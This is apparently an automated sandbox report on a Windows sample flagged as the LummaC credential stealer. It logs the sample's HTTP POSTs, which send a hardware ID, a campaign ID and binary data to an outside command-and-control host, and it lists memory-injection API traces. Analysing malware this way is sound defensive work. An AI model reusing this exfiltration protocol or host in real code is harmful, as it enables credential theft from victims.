2025-01-10 10:36:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:36:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49722	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:25 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1K58B3BFUN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15031 Host: sputnik-1985.com
2025-01-10 10:36:25 UTC	15031	OUT	Data Raw: 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 31 4b 35 38 42 33 42 46 55 4e 0d 0a 43 Data Ascii: --1K58B3BFUNContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--1K58B3BFUNContent-Disposition: form-data; name="pid"2--1K58B3BFUNContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--1K58B3BFUNC
2025-01-10 10:36:25 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v8e9nemri3dle1oi8gebej0l4f; expires=Tue, 06 May 2025 04:23:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9DS5L8dzR%2B3fZjV1Jn8de0vlOXKOFRMV3t3ZmKdGGDfkQhjWQpR9ci9bfviFVw5rXWgs16yrIJ%2FDUb1WSlEOyU8EBeKZ7gdgCMLeay9aqCDlKkVFZ5JtsZbh8S4OGq25Xfr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc06a25f0942e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1684&rtt_var=636&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15963&delivery_rate=1715628&cwnd=240&unsent_bytes=0&cid=8204e47e2d1c1ee9&ts=522&x=0"
2025-01-10 10:36:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:36:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49724	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:26 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LCECPHTHGH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20206 Host: sputnik-1985.com
2025-01-10 10:36:26 UTC	15331	OUT	Data Raw: 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 4c 43 45 43 50 48 54 48 47 48 0d 0a 43 Data Ascii: --LCECPHTHGHContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--LCECPHTHGHContent-Disposition: form-data; name="pid"3--LCECPHTHGHContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--LCECPHTHGHC
2025-01-10 10:36:26 UTC	4875	OUT	Data Raw: 62 df 0f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 6e 38 3a 2c f6 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 83 cf c7 92 c1 ab b1 e0 d5 e0 97 82 ff 63 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 bb 2f f9 58 bc 52 2d ce 14 cb 93 d3 d5 c2 54 a1 3c 75 7d 72 aa d2 28 d7 13 a3 c9 f1 0d 29 b5 c6 dc 07 c2 42 7b df 7e fd 0f 26 8f 27 ba d4 32 59 99 9e ac bd d2 c8 55 0b b5 e4 3d 23 51 c6 c5 3e 1c 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 30 1c 1d 16 fb 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: b}n8:,0c</XR-T<u}r()B{~&'2YU=#Q>\|0~
2025-01-10 10:36:27 UTC	1135	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5vnnarr71cm1eepn38qpmdnb5r; expires=Tue, 06 May 2025 04:23:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VnKSL9b5MKcstgSSkxIKDIg9XQd%2FGgY6QHaQLQOXonk0VfL%2FopT%2FACCO8kjeIllD1OhfrJTM2sP%2B%2FwNcVHtx6%2Fbic0uoUlCTWmUyNVADcdvlOScijKioJ1o%2B%2FlBtVVv93M8x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc06aaec8a42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1721&rtt_var=653&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21160&delivery_rate=1665715&cwnd=240&unsent_bytes=0&cid=7d8718b14fdbbdda&ts=625&x=0"
2025-01-10 10:36:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:36:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	49725	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:28 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=075K4N27BXN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1231 Host: sputnik-1985.com
2025-01-10 10:36:28 UTC	1231	OUT	Data Raw: 2d 2d 30 37 35 4b 34 4e 32 37 42 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 30 37 35 4b 34 4e 32 37 42 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 37 35 4b 34 4e 32 37 42 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 30 37 35 4b 34 4e 32 37 42 58 Data Ascii: --075K4N27BXNContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--075K4N27BXNContent-Disposition: form-data; name="pid"1--075K4N27BXNContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--075K4N27BX
2025-01-10 10:36:28 UTC	1122	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=om52u0ubj8o8uo8vaio2aa6pm3; expires=Tue, 06 May 2025 04:23:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=llXMJiYpebkpKV%2BF91yHEJe8z7G7XjoXj44g%2FEPqjwF3PuIhHx149yQV3rGXHtwd1BnnFFQK0fdzlBpP0SiZ9MFbXZ5WBiFMBzeXEhyUtKZSiBqSyNvI%2BNQmrgwW4QqR08Ir"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc06b3cae67c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1964&rtt_var=742&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2141&delivery_rate=1468074&cwnd=218&unsent_bytes=0&cid=ec0f90dd1ab10149&ts=439&x=0"
2025-01-10 10:36:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:36:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.12	49727	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:29 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZIOL9PUC4F User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1065 Host: sputnik-1985.com
2025-01-10 10:36:29 UTC	1065	OUT	Data Raw: 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43 Data Ascii: --ZIOL9PUC4FContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--ZIOL9PUC4FContent-Disposition: form-data; name="pid"1--ZIOL9PUC4FContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--ZIOL9PUC4FC
2025-01-10 10:36:29 UTC	1120	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7d198i746vi1laidl21f16lssq; expires=Tue, 06 May 2025 04:23:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUNopk5QN8WplhQzliFy8pNfT0kBMyHQswJYLUNoV7LCwM1xRNeHZCVIv%2BIPGgQY923O6rrwYuZJeDWLprY7HgQvPqIct0z8ckngfhjqexMUWAnQujIH1xltQZgGvi8B%2B7xV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc06b9ee7f8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1948&rtt_var=735&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1974&delivery_rate=1483739&cwnd=168&unsent_bytes=0&cid=d50bc995e92b644b&ts=541&x=0"
2025-01-10 10:36:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 10:36:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.12	49728	104.21.64.1	443	6988	C:\Users\user\Desktop\expt64.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:36:30 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: sputnik-1985.com
2025-01-10 10:36:30 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=3C04669308839219BCFD68B774EF9B7A
2025-01-10 10:36:30 UTC	1134	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:36:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pecfu88bivvgccqqg0qunps66n; expires=Tue, 06 May 2025 04:23:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAk%2BeagfmvE2bvmvQ4%2B%2B3VbH981V9n%2BpKsjMKpt%2BYEUIb6KzMuzAJwt%2FiUyf6iydcWk63c3TTD8Ar%2Bp8fjXyQPs%2FNX%2FesrbMDn3hqUmBYD81OIgXu7k4TNS2RrehavADfuyQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc06c26b787c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2021&rtt_var=767&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1418853&cwnd=218&unsent_bytes=0&cid=3df8a990b05a237e&ts=462&x=0"
2025-01-10 10:36:30 UTC	54	IN	Data Raw: 33 30 0d 0a 75 37 45 61 75 2b 61 54 79 6d 62 79 76 4c 52 50 4e 43 4b 47 47 46 58 4d 59 53 43 38 2f 73 39 64 52 75 79 2b 6d 50 71 63 61 6c 7a 67 37 41 3d 3d 0d 0a Data Ascii: 30u7Eau+aTymbyvLRPNCKGGFXMYSC8/s9dRuy+mPqcalzg7A==
2025-01-10 10:36:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:36:07
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\expt64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\expt64.exe"
Imagebase:	0x400000
File size:	10'171'362 bytes
MD5 hash:	C4CB62A984955F3AD185C1B289D816D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	36.7%
Total number of Nodes:	128
Total number of Limit Nodes:	13

Executed Functions

Function 02342664 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 023426FD
NtMapViewOfSection.NTDLL(?,00000000), ref: 023427A5
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02342B19
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02342BCE
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02342BEB
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02342C8E
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02342CC1
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02342E32

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: aee67486749d84231354ea0d8b63c672d27ab598786af6a355477c165855f42e
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: 65427871604301AFDB24CF25C844B6BBBE9EF88714F1449ADFD85AB251EB30E944CB91

Function 022F0CBF Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,022F0805,?,00000001,?,81EC8B55,000000FF), ref: 022F0CFD
Thread32First.KERNEL32(00000000,0000001C), ref: 022F0D29
Wow64SuspendThread.KERNEL32(00000000), ref: 022F0D7C
CloseHandle.KERNEL32(00000000), ref: 022F0DA6

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 035b000b9a6df816d55b3f597d2b05679cb87230b73955747dfef44f262af167
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: C1411E71A00109AFDB58DF98C490FADB7F6EF88300F508168E6159B799DB35AE41CB94

Function 022F05AF Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 022F0852

Strings

DfB, xrefs: 022F061B

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: DfB
API String ID: 2422867632-4156147959
Opcode ID: b4fc5f4db1c781e55f86b7ec5908b47ba6b87ba54054a6bb3863a94c77eeda71
Instruction ID: 6b8890dc0988c72cb92ce3b83dfc035b894f628eb05fc298c376d73ed854481e
Opcode Fuzzy Hash: b4fc5f4db1c781e55f86b7ec5908b47ba6b87ba54054a6bb3863a94c77eeda71
Instruction Fuzzy Hash: 3C12B3B4E10219DBDB14CF98C990BADFBB2FF48304F2482A9D615AB389D7746A41CF54

Function 022F0B6F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 022F0C3B

Strings

,, xrefs: 022F0C87

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 36017e2c47d3839eb711a1cdb2fde0e39aad7a572a2d8243b87e9001cceb6fdc
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: 6A41E574A00209EFDB04CF98C994BAEB7B1FF48304F2081A8D515AB399C771AE85CF94

Function 023410C4 Relevance: 6.1, APIs: 4, Instructions: 99
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 023432E2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 02343374

VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 0234111F
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02341152
VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 02341185
VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 023411AF

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2e97600cb857c96b3e27a7ca78dc6b50189988e4741ea1636e9ebab3cfc04358
Instruction ID: 22d7af0f707137cef9ab685f0bf46cf8ee987b3d3961c3ab3db48c26ff0abfc5
Opcode Fuzzy Hash: 2e97600cb857c96b3e27a7ca78dc6b50189988e4741ea1636e9ebab3cfc04358
Instruction Fuzzy Hash: 152194722046493EE320AAA18C44FB777DCDB85304F0404BEFE4AD2591EF65B54586A5

Function 02341F34 Relevance: 4.8, APIs: 3, Instructions: 325
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02341FAE
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 023422F2
RtlExitUserProcess.NTDLL(00000000), ref: 023422FB

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: Virtual$AllocExitFreeProcessUser
String ID:
API String ID: 1828502597-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: 3fe85efe111094b8ba8061d0edb2f70e96cf22fd1a42799f20c848e16e86a12c
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: DCB1D131600B06ABDB759A60CC80BBBB7E9FF45314F140699FE99A2150EF31F551CB91

Function 023432E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 02343374

Strings

.dll, xrefs: 02343319

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: bb5fe7d9727ad801070afec8a9a15e305a9c1a7e5dd8473318e40f73744ea46a
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
